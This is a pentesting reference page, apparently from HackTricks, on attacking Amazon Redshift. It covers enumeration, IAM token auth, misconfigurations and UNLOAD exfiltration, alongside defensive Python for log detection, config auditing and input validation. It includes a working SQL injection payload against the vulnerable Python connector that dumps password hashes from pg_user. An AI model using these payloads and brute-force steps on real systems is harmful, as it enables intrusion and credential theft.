5439 - Pentesting Redshift

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

This port is used by Amazon Redshift (the AWS managed data warehouse). The Redshift wire protocol is a slightly modified PostgreSQL protocol, so most Postgres client tooling works (psql, psycopg2, JDBC/ODBC), but the authentication and TLS requirements differ.

For more information check:

AWS - Redshift Enum - HackTricks Cloud

Enumeration and Connection

  • Default port: 5439/TCP (configurable). Serverless workgroups also listen on 5439.
  • Public endpoint example: <clusterid>.<random>.<region>.redshift.amazonaws.com (public) or .redshift.amazonaws.com.cn (China). Serverless: <workgroup>.<random>.<region>.redshift-serverless.amazonaws.com.
  • TLS: Redshift requires TLS 1.2+ and perfect-forward-secrecy ciphers. Old clients may fail; force modern TLS:
psql "host=<endpoint> port=5439 user=awsuser dbname=dev sslmode=require"
# or using redshift-psql wrapper
  • The parameter-group setting require_ssl controls whether plaintext connections are permitted. New clusters/workgroups use default.redshift-2.0 with require_ssl=true, so downgrade/MitM attacks are harder.

Quick enumeration with psql

# basic banner/version (force TLS as described above)
psql "host=<endpoint> user=<u> dbname=dev sslmode=require" -c 'select version();'
# inside the interactive psql session: list dbs, users, privileges, then query the catalog
\l
\du
select * from pg_user;
select * from svv_redshift_sessions;

Error messages differ between a bad password and a non-existent user, so brute-force attempts can double as username enumeration.
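From the defender's side, the behaviour described above (many failed logins from one source spread across several usernames, then a success) is what a connection-log detection should key on. The following is an added example, not part of the original page: it parses a constructed, simplified pipe-delimited log (the column order `recordtime|event|remotehost|dbname|username|authmethod` and the event names are assumptions for this example; the real Redshift connection log carries more columns) and flags failed-login bursts, username spraying, and a success that follows a burst.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not real data). Simplified layout assumed for this example:
# recordtime|event|remotehost|dbname|username|authmethod
SAMPLE_LOG = """\
2025-01-15 10:00:01|authentication failure|203.0.113.7|dev|awsuser|password
2025-01-15 10:00:02|authentication failure|203.0.113.7|dev|admin|password
2025-01-15 10:00:03|authentication failure|203.0.113.7|dev|redshift|password
2025-01-15 10:00:04|authentication failure|203.0.113.7|dev|etl|password
2025-01-15 10:00:05|authentication failure|203.0.113.7|dev|analyst|password
2025-01-15 10:00:06|authentication failure|203.0.113.7|dev|pentest|password
2025-01-15 10:00:09|authenticated|203.0.113.7|dev|analyst|password
2025-01-15 10:05:00|authentication failure|10.0.0.5|dev|etl|password
2025-01-15 10:20:00|authenticated|10.0.0.5|dev|etl|password
"""


def parse(lines):
    """Yield (timestamp, event, host, db, user, authmethod) tuples from the sample layout."""
    for line in lines.splitlines():
        if not line.strip():
            continue
        ts, event, host, db, user, auth = line.split("|")
        yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), event, host, db, user, auth


def analyze(lines, window=timedelta(minutes=5), max_failures=5):
    """Per source host: peak failures inside a sliding window, peak distinct usernames
    tried in that window, and whether a successful login followed a burst."""
    failures = defaultdict(list)  # host -> [(ts, user)] still inside the window
    summary = defaultdict(lambda: {"max_failures": 0, "max_users": 0, "success_after_burst": False})
    for ts, event, host, _db, user, _auth in sorted(parse(lines)):
        recent = [(t, u) for t, u in failures[host] if ts - t <= window]
        if event == "authentication failure":
            recent.append((ts, user))
            s = summary[host]
            s["max_failures"] = max(s["max_failures"], len(recent))
            s["max_users"] = max(s["max_users"], len({u for _, u in recent}))
        elif event == "authenticated" and len(recent) >= max_failures:
            # a valid login right after a burst is the highest-priority signal
            summary[host]["success_after_burst"] = True
        failures[host] = recent
    return dict(summary)


def alerts(lines, max_failures=5, max_users=3):
    """Return (host, reason, peak_failures, peak_distinct_users) for hosts worth alerting on."""
    out = []
    for host, s in analyze(lines, max_failures=max_failures).items():
        if s["max_failures"] >= max_failures or s["max_users"] >= max_users:
            reason = "success after burst" if s["success_after_burst"] else "failed-login burst"
            out.append((host, reason, s["max_failures"], s["max_users"]))
    return out


if __name__ == "__main__":
    for alert in alerts(SAMPLE_LOG):
        print(alert)
```

The distinct-username threshold is deliberately lower than the raw failure threshold: one user mistyping a password five times is noise, while six different usernames from one address in a minute is enumeration.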

Authentication paths to test

  • Database password for master user (often named awsuser) or created DB users.
  • IAM auth tokens: generate short-lived credentials and connect via libpq/JDBC/ODBC using sslmode=require and authMech=IAM or plugin_name=com.amazon.redshift.plugin.OktaCredentialsProvider. Stolen IAM credentials/roles holding the Redshift equivalent of an rds-db:connect style permission can mint these tokens.
aws redshift get-cluster-credentials --cluster-identifier <id> \
--db-user pentest --db-name dev --duration-seconds 900
# use the DbUser and DbPassword values from the JSON output; DbUser comes back prefixed (IAM:pentest)
psql "host=<endpoint> user=IAM:pentest password=<token> dbname=dev sslmode=require"
  • IAM Identity Center / SAML / Azure AD plugins: the JDBC plugin_name may spin up a local web server for SSO; a captured loopback callback can leak the SAML assertion or temporary credentials.

Common misconfigurations (network)

  • A cluster marked PubliclyAccessible=true with a wide-open security group (0.0.0.0/0) exposes a Postgres-like surface for brute force or SQLi exploitation.
  • Default port 5439 plus the default SG makes discovery easy (Shodan/Censys). Changing the port is minor obscurity but is sometimes overlooked in hardening checklists.
  • No enhanced VPC routing → COPY/UNLOAD traffic goes over the public Internet; this can be abused for exfiltration when the attacker controls the S3 bucket/endpoint.
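The network misconfigurations listed above, together with the require_ssl and enable_user_activity_logging parameters mentioned elsewhere on this page, are all visible from the control plane, so a defender can audit them without touching port 5439. The following is an added example, not part of the original page: it evaluates constructed JSON samples shaped like the output of `aws redshift describe-clusters`, `aws redshift describe-cluster-parameters` and the ingress rules from `aws ec2 describe-security-groups` (the cluster names, security-group ids and endpoints are made up) and reports the findings per cluster. Feeding it real CLI output instead of the samples is the assumed usage.

```python
import json

# Constructed sample shaped like `aws redshift describe-clusters` (made-up identifiers).
SAMPLE_CLUSTERS = json.loads("""
{
  "Clusters": [
    {
      "ClusterIdentifier": "legacy-dw",
      "PubliclyAccessible": true,
      "Encrypted": false,
      "EnhancedVpcRouting": false,
      "Endpoint": {"Address": "legacy-dw.EXAMPLE.us-east-1.redshift.amazonaws.com", "Port": 5439},
      "ClusterParameterGroups": [{"ParameterGroupName": "legacy-pg"}],
      "VpcSecurityGroups": [{"VpcSecurityGroupId": "sg-0123"}]
    },
    {
      "ClusterIdentifier": "hardened-dw",
      "PubliclyAccessible": false,
      "Encrypted": true,
      "EnhancedVpcRouting": true,
      "Endpoint": {"Address": "hardened-dw.EXAMPLE.us-east-1.redshift.amazonaws.com", "Port": 5439},
      "ClusterParameterGroups": [{"ParameterGroupName": "default.redshift-2.0"}],
      "VpcSecurityGroups": [{"VpcSecurityGroupId": "sg-4567"}]
    }
  ]
}
""")

# Constructed samples shaped like `aws redshift describe-cluster-parameters`, keyed by group name.
SAMPLE_PARAMS = {
    "legacy-pg": {"Parameters": [
        {"ParameterName": "require_ssl", "ParameterValue": "false"},
        {"ParameterName": "enable_user_activity_logging", "ParameterValue": "false"},
    ]},
    "default.redshift-2.0": {"Parameters": [
        {"ParameterName": "require_ssl", "ParameterValue": "true"},
        {"ParameterName": "enable_user_activity_logging", "ParameterValue": "true"},
    ]},
}

# Constructed samples shaped like the IpPermissions of `aws ec2 describe-security-groups`.
SAMPLE_SG_INGRESS = {
    "sg-0123": [{"FromPort": 5439, "ToPort": 5439, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}],
    "sg-4567": [{"FromPort": 5439, "ToPort": 5439, "IpRanges": [{"CidrIp": "10.0.0.0/8"}]}],
}


def param_value(params, name, default=None):
    """Look up one parameter value in a describe-cluster-parameters document."""
    for p in params.get("Parameters", []):
        if p["ParameterName"] == name:
            return p["ParameterValue"]
    return default


def sg_open_to_world(rules, port):
    """True if any ingress rule covering `port` allows 0.0.0.0/0."""
    for r in rules:
        if r.get("FromPort", 0) <= port <= r.get("ToPort", 65535):
            if any(ip.get("CidrIp") == "0.0.0.0/0" for ip in r.get("IpRanges", [])):
                return True
    return False


def audit_cluster(cluster, params_by_group, sg_ingress):
    """Return a list of human-readable findings for one cluster."""
    findings = []
    port = cluster["Endpoint"]["Port"]
    if cluster.get("PubliclyAccessible"):
        findings.append("publicly accessible endpoint")
        for sg in cluster.get("VpcSecurityGroups", []):
            sg_id = sg["VpcSecurityGroupId"]
            if sg_open_to_world(sg_ingress.get(sg_id, []), port):
                findings.append(f"{sg_id} allows 0.0.0.0/0 on port {port}")
    if not cluster.get("Encrypted"):
        findings.append("encryption at rest disabled")
    if not cluster.get("EnhancedVpcRouting"):
        findings.append("enhanced VPC routing off: COPY/UNLOAD traverse the public Internet")
    for g in (pg["ParameterGroupName"] for pg in cluster.get("ClusterParameterGroups", [])):
        params = params_by_group.get(g, {})
        if param_value(params, "require_ssl", "false") != "true":
            findings.append(f"{g}: require_ssl is not true (plaintext connections allowed)")
        if param_value(params, "enable_user_activity_logging", "false") != "true":
            findings.append(f"{g}: user activity logging disabled")
    return findings


def audit_all(clusters, params_by_group, sg_ingress):
    """Map each ClusterIdentifier to its findings."""
    return {c["ClusterIdentifier"]: audit_cluster(c, params_by_group, sg_ingress)
            for c in clusters["Clusters"]}


if __name__ == "__main__":
    for cid, findings in audit_all(SAMPLE_CLUSTERS, SAMPLE_PARAMS, SAMPLE_SG_INGRESS).items():
        print(cid, "->", findings or ["no findings"])
```

A missing parameter is treated as "not true" on purpose: a group that does not set require_ssl at all is exactly the case where plaintext may still be accepted, and the audit should say so rather than stay silent.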

Attack notes

  • If login succeeds: serverless has no superuser, but in provisioned clusters the master user has broad rights, including creating Python UDFs, defining external schemas for Spectrum, COPY from an attacker-controlled S3 bucket, and UNLOAD to exfiltrate data.
  • Check the cluster parameter group for max_concurrency_scaling_clusters, require_ssl and enable_user_activity_logging – logging being disabled aids stealth.
  • Serverless workgroups are still reachable via TCP and present the same SQL attack surface as provisioned clusters.
  • Client-side metadata SQLi (Dec 2024): JDBC 2.1.0.31, Python connector 2.1.4 and ODBC 2.1.5.0 build metadata queries with unquoted user input in getSchemas/getTables/getColumns (CVE-2024-12744/5/6). If an app lets attackers control the catalog or pattern arguments, they can inject arbitrary SQL that runs as the DB user the connector uses.
# exploit vulnerable python connector 2.1.4 via metadata API
import redshift_connector
conn = redshift_connector.connect(host='<endpoint>', database='dev', user='lowpriv', password='pw')
cur = conn.cursor()
# injection in table_name_pattern leaks data from pg_tables
# (the cursor's keyword for the schema filter is schema_pattern)
cur.get_tables(schema_pattern='public', table_name_pattern="%' UNION SELECT usename,passwd FROM pg_user--")
  • UDF execution model change: Python UDFs stop working on June 30, 2026; only Lambda UDFs are allowed after that. Offensive impact: legacy provisioned clusters still run Python UDFs for in-cluster code execution (no FS/network). Lambda UDFs move the code to Lambda, where the IAM role may reach Internet/VPC endpoints for SSRF/pivoting but has no direct cluster filesystem access. Hunting old clusters with Python UDFs enabled can still yield RCE primitives.
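The connector bugs above are a client-side problem: the vulnerable metadata calls interpolate the catalog/pattern arguments into SQL, so an application that forwards user-controlled values into getTables/getColumns is injectable even though the server and the query are otherwise fine. Besides upgrading the connector, the application-side fix is to treat those arguments as identifiers, not free text. The following is an added example, not the connector's own code: an allowlist validator for LIKE-style pattern arguments, a wrapper that applies it before calling a cursor's get_tables, and a constructed stand-in cursor so the wrapper can run offline (the hypothetical `_FakeCursor` mirrors only the two keyword arguments the wrapper passes).

```python
import re

# Allowlist for schema/table/column pattern arguments: identifier characters plus the
# LIKE wildcards. Quotes, semicolons, comment markers and whitespace are rejected outright
# rather than escaped, so a payload like  %' UNION SELECT ... --  never reaches the connector.
_ALLOWED = re.compile(r"[A-Za-z0-9_%.]{1,127}")


class UnsafePattern(ValueError):
    """Raised when a metadata pattern argument fails the allowlist."""


def validate_pattern(value, allow_none=True):
    """Return `value` unchanged if it is a safe pattern, else raise UnsafePattern."""
    if value is None:
        if allow_none:
            return None
        raise UnsafePattern("pattern is required")
    if not isinstance(value, str) or not _ALLOWED.fullmatch(value):
        raise UnsafePattern(f"rejected pattern: {value!r}")
    return value


def is_safe(value):
    """Boolean form of validate_pattern for callers that prefer not to catch exceptions."""
    try:
        validate_pattern(value)
        return True
    except UnsafePattern:
        return False


def escape_literal(value):
    """Defense in depth for code that must build a SQL string itself: doubling single
    quotes keeps the value inside its string literal. Prefer the allowlist above."""
    return value.replace("'", "''")


def safe_get_tables(cursor, schema_pattern=None, table_name_pattern=None):
    """Validate both pattern arguments, then call the cursor's get_tables.
    `cursor` is any object exposing get_tables(schema_pattern=..., table_name_pattern=...)."""
    return cursor.get_tables(
        schema_pattern=validate_pattern(schema_pattern),
        table_name_pattern=validate_pattern(table_name_pattern),
    )


class _FakeCursor:
    """Constructed stand-in for a connector cursor (hypothetical, for offline use only):
    records the arguments it receives and returns canned rows."""

    def __init__(self):
        self.calls = []

    def get_tables(self, schema_pattern=None, table_name_pattern=None):
        self.calls.append((schema_pattern, table_name_pattern))
        return [("public", "orders"), ("public", "users")]


if __name__ == "__main__":
    cur = _FakeCursor()
    print(safe_get_tables(cur, "public", "ord%"))
    for candidate in ("public", "sales_2025", "%' UNION SELECT usename,passwd FROM pg_user--"):
        print(repr(candidate), "->", "ok" if is_safe(candidate) else "rejected")
```

Rejecting rather than escaping is the safer default here because the connector, not the application, decides how the argument ends up in SQL; an escape that is correct for one connector version can be wrong for the next.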

Recent security changes (offense impact)

  • Public access is disabled by default on new clusters/snapshots (Jan 10, 2025 change). Legacy ones may still be public.
  • Encryption at rest plus enforced TLS by default mean sniffing/MitM is harder; you need valid credentials or SSRF into the VPC path.
  • Serverless VPCE rollout change (Jun 27, 2025): workgroup endpoints are created in up to 3 AZs at creation time. Discovery tools should enumerate all workgroup VPCE DNS names per AZ to find reachable IPs.
